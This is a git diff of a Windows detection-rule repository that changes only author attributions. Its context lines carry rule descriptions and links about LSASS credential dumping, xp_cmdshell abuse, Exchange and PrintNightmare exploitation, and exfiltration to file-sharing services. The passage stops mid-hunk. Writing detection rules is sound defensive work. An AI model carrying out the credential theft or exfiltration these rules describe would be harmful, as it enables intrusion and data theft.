diff --git a/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml b/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml
index d37a036ac..310c462df 100644
--- a/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml
+++ b/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml
@@ -6,7 +6,7 @@ references:
 - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
 - https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16
 - https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/13
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml b/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml
index 0a8eae309..b7901b837 100644
--- a/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml
+++ b/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml
@@ -5,7 +5,7 @@ description: Detects when the a stored procedure is set or cleared for automatic
 references:
 - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
 - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/13
 tags:
 - attack.persistence
diff --git a/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml b/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml
index f88127a4a..b0bca67b3 100644
--- a/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml
+++ b/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml
@@ -5,7 +5,7 @@ description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to ex
 references:
 - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/12
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml b/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml
index 6d59e01df..fd93f6dce 100644
--- a/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml
+++ b/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml
@@ -5,7 +5,7 @@ description: Detects when the MSSQL "xp_cmdshell" stored procedure setting is ch
 references:
 - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
 - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/12
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/application/win_susp_backup_delete.yml b/rules/windows/builtin/application/win_susp_backup_delete.yml
index 3c4090da4..871ca2a81 100644
--- a/rules/windows/builtin/application/win_susp_backup_delete.yml
+++ b/rules/windows/builtin/application/win_susp_backup_delete.yml
@@ -5,7 +5,7 @@ description: Detects backup catalog deletions
 references:
 - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx
 - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100
-author: Florian Roth (rule), Tom U. @c_APT_ure (collection)
+author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)
 date: 2017/05/12
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/builtin/application/win_susp_msmpeng_crash.yml b/rules/windows/builtin/application/win_susp_msmpeng_crash.yml
index c97871988..3bdf9f6f1 100644
--- a/rules/windows/builtin/application/win_susp_msmpeng_crash.yml
+++ b/rules/windows/builtin/application/win_susp_msmpeng_crash.yml
@@ -5,7 +5,7 @@ description: This rule detects a suspicious crash of the Microsoft Malware Prote
 references:
 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
 - https://technet.microsoft.com/en-us/library/security/4022344
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/05/09
 modified: 2022/07/12
 tags:
diff --git a/rules/windows/builtin/application/win_vul_cve_2020_0688.yml b/rules/windows/builtin/application/win_vul_cve_2020_0688.yml
index 4664c9f19..27199fce3 100644
--- a/rules/windows/builtin/application/win_vul_cve_2020_0688.yml
+++ b/rules/windows/builtin/application/win_vul_cve_2020_0688.yml
@@ -5,7 +5,7 @@ description: Detects the exploitation of Microsoft Exchange vulnerability as des
 references:
 - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/
 - https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/
-author: Florian Roth, wagga
+author: Florian Roth (Nextron Systems), wagga
 date: 2020/02/29
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/builtin/application/win_vul_cve_2021_41379.yml b/rules/windows/builtin/application/win_vul_cve_2021_41379.yml
index 501586ba0..08ba177eb 100644
--- a/rules/windows/builtin/application/win_vul_cve_2021_41379.yml
+++ b/rules/windows/builtin/application/win_vul_cve_2021_41379.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379
 references:
 - https://github.com/klinix5/InstallerFileTakeOver
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/22
 modified: 2022/07/12
 tags:
diff --git a/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml b/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml
index d4ac076dd..420037348 100644
--- a/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml
+++ b/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/deepinstinct/Lsass-Shtinkering
 - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
 - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/07
 tags:
 - attack.credential_access
diff --git a/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml b/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml
index b62c4f02b..07e9eff3f 100644
--- a/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml
+++ b/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of Sysinternals tools via an AppX package. Attackers could instal the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths
 references:
 - Internal Research
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/16
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml
index 519c9f7b7..520a58bf4 100644
--- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml
+++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml
@@ -6,7 +6,7 @@ references:
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
 - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
 - https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 modified: 2023/01/12
 tags:
diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
index 5399760e3..30e93308f 100644
--- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
+++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml
@@ -7,7 +7,7 @@ references:
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
 - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
 - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
index 591239dcc..3d3bbed2f 100644
--- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
+++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
@@ -7,7 +7,7 @@ references:
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
 - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
 - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
index 73ee87ff0..19b333749 100644
--- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
+++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
@@ -7,7 +7,7 @@ references:
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
 - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
 - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml
index 937a84dfa..dedc37ede 100644
--- a/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml
+++ b/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml
@@ -7,7 +7,7 @@ references:
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
 - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
 - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml b/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml
index 299085328..af67b2857 100644
--- a/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml
+++ b/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml
@@ -5,7 +5,7 @@ description: Detects execution of AppX packages with known suspicious or malicio
 references:
 - Internal Research
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/16
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml b/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml
index c333f1442..edb4dc744 100644
--- a/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml
+++ b/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml
@@ -10,7 +10,7 @@ references:
 - https://isc.sans.edu/diary/22264
 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
 - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml b/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml
index 87d82d6aa..e4d29e91e 100644
--- a/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml
+++ b/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
 - https://twitter.com/malmoeb/status/1535142803075960832
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/28
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml b/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml
index 413cfccab..1b1bd67f3 100644
--- a/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml
+++ b/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml
@@ -6,7 +6,7 @@ description: |
 Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/28
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml b/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml
index 9d0b5e856..9eec03fa2 100644
--- a/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml
+++ b/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious download using the BITS client from a FQDN tha
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
 - https://twitter.com/malmoeb/status/1535142803075960832
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/10
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml b/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml
index 7524598fa..192f2dd3d 100644
--- a/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml
+++ b/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml
@@ -1,7 +1,7 @@
 title: Code Integrity Attempted DLL Load
 id: f8931561-97f5-4c46-907f-0a4a592e47a7
 description: Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 status: experimental
 references:
 - https://twitter.com/SBousseaden/status/1483810148602814466
diff --git a/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml b/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml
index cd2a4ad9b..0712e124d 100644
--- a/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml
+++ b/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml
@@ -1,7 +1,7 @@
 title: Code Integrity Blocked Driver Load
 id: e4be5675-4a53-426a-8c81-a8bb2387e947
 description: Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 status: experimental
 references:
 - https://twitter.com/wdormann/status/1590434950335320065
diff --git a/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml b/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml
index 5fb3d989d..5bbfa0152 100644
--- a/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml
+++ b/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml
@@ -1,7 +1,7 @@
 title: Block Load Of Revoked Driver
 id: 9b72b82d-f1c5-4632-b589-187159bc6ec1
 description: Detects blocked load attempts of revoked drivers
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 status: experimental
 references:
 - https://twitter.com/wdormann/status/1590434950335320065
diff --git a/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml b/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml
index e2de8127e..a9a8fbe29 100644
--- a/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml
+++ b/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml
@@ -5,7 +5,7 @@ description: Detects loading of diagcab packages from a remote path, as seen in
 references:
 - https://twitter.com/nas_bench/status/1539679555908141061
 - https://twitter.com/j00sean/status/1537750439701225472
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/14
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml b/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml
index be15f2373..0bd1e2212 100644
--- a/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml
+++ b/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml
@@ -8,7 +8,7 @@ description: Detects a program that invoked suspicious DNS queries known from Co
 references:
 - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns
 - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/16
 tags:
 - attack.command_and_control
diff --git a/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml b/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml
index 467dbdcc0..c7e01fa2b 100644
--- a/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml
+++ b/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes
 references:
 - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/16
 tags:
 - attack.exfiltration
diff --git a/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml b/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml
index e58b68a6b..3cd225570 100644
--- a/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml
+++ b/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects DNS queries for subdomains used for upload to MEGA.io
 references:
 - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/16
 tags:
 - attack.exfiltration
diff --git a/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml b/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml
index 38fcdae97..d1fd8d13a 100644
--- a/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml
+++ b/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects DNS resolution of an .onion address related to Tor routing networks
 references:
 - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/02/20
 tags:
 - attack.command_and_control
diff --git a/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml b/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml
index 371f2ab3a..5c2d83e62 100644
--- a/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml
+++ b/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects DNS queries to "ufile.io". Which is often abused by malware for upload and exfiltration
 references:
 - https://thedfirreport.com/2021/12/13/diavol-ransomware/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/16
 tags:
 - attack.exfiltration
diff --git a/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml b/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml
index e7ebe7fcd..b3a5eb62e 100644
--- a/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml
+++ b/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml
@@ -6,7 +6,7 @@ references:
 - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
 - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx
 - https://twitter.com/gentilkiwi/status/861641945944391680
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/05/08
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml b/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml
index fb40783bf..4fe4f122b 100644
--- a/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml
+++ b/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml
@@ -5,7 +5,7 @@ description: Detects plugged/unplugged USB devices
 references:
 - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/
 - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/11/09
 modified: 2021/11/30
 tags:
diff --git a/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml b/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml
index a134f1d97..09b11ad9c 100644
--- a/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml
+++ b/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
 references:
 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321
-author: 'Florian Roth, @testanull'
+author: 'Florian Roth (Nextron Systems), @testanull'
 date: 2021/11/18
 modified: 2022/07/12
 tags:
diff --git a/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml
index 81f1c91be..dbe4af2d6 100644
--- a/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml
+++ b/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
 references:
 - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/09
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml b/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml
index 177a90402..2de17e7a1 100644
--- a/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml
+++ b/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
 references:
 - https://twitter.com/GossiTheDog/status/1429175908905127938
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2021/08/23
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml b/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml
index bdd232104..3bfc3b746 100644
--- a/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml
+++ b/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
 references:
 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
-author: Florian Roth, Rich Warren, Christian Burkard
+author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
 date: 2021/08/09
 modified: 2022/10/26
 tags:
diff --git a/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml b/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml
index 0b2e3b193..db7cb0a54 100644
--- a/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml
+++ b/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit
 references:
 - https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/27
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/builtin/msexchange/win_exchange_transportagent.yml b/rules/windows/builtin/msexchange/win_exchange_transportagent.yml
index d5ada08d4..049794fa0 100644
--- a/rules/windows/builtin/msexchange/win_exchange_transportagent.yml
+++ b/rules/windows/builtin/msexchange/win_exchange_transportagent.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects the Installation of a Exchange Transport Agent
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7
-author: Tobias Michalski
+author: Tobias Michalski (Nextron Systems)
 date: 2021/06/08
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml b/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml
index 3502696f4..0f85b3fb1 100644
--- a/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml
+++ b/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a failed installation of a Exchange Transport Agent
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8
-author: Tobias Michalski
+author: Tobias Michalski (Nextron Systems)
 date: 2021/06/08
 modified: 2022/07/12
 tags:
diff --git a/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml b/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml
index bb7b90e7f..cc1aea20b 100644
--- a/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml
+++ b/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml
@@ -5,7 +5,7 @@ description: Detects logons using NTLM, which could be caused by a legacy source
 references:
 - https://twitter.com/JohnLaTwC/status/1004895028995477505
 - https://goo.gl/PsqrhT
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/06/08
 modified: 2022/10/05
 tags:
diff --git a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml
index c3915cf3f..018dfe55c 100644
--- a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml
+++ b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml
@@ -6,7 +6,7 @@ references:
 - https://github.com/hhlxf/PrintNightmare
 - https://github.com/afwu/PrintNightmare
 - https://twitter.com/fuzzyf10w/status/1410202370835898371
-author: Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton
+author: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton
 date: 2021/06/30
 modified: 2022/11/15
 tags:
diff --git a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml
index 5bfbe57e0..63e98252c 100644
--- a/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml
+++ b/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml
@@ -4,7 +4,7 @@ status: test
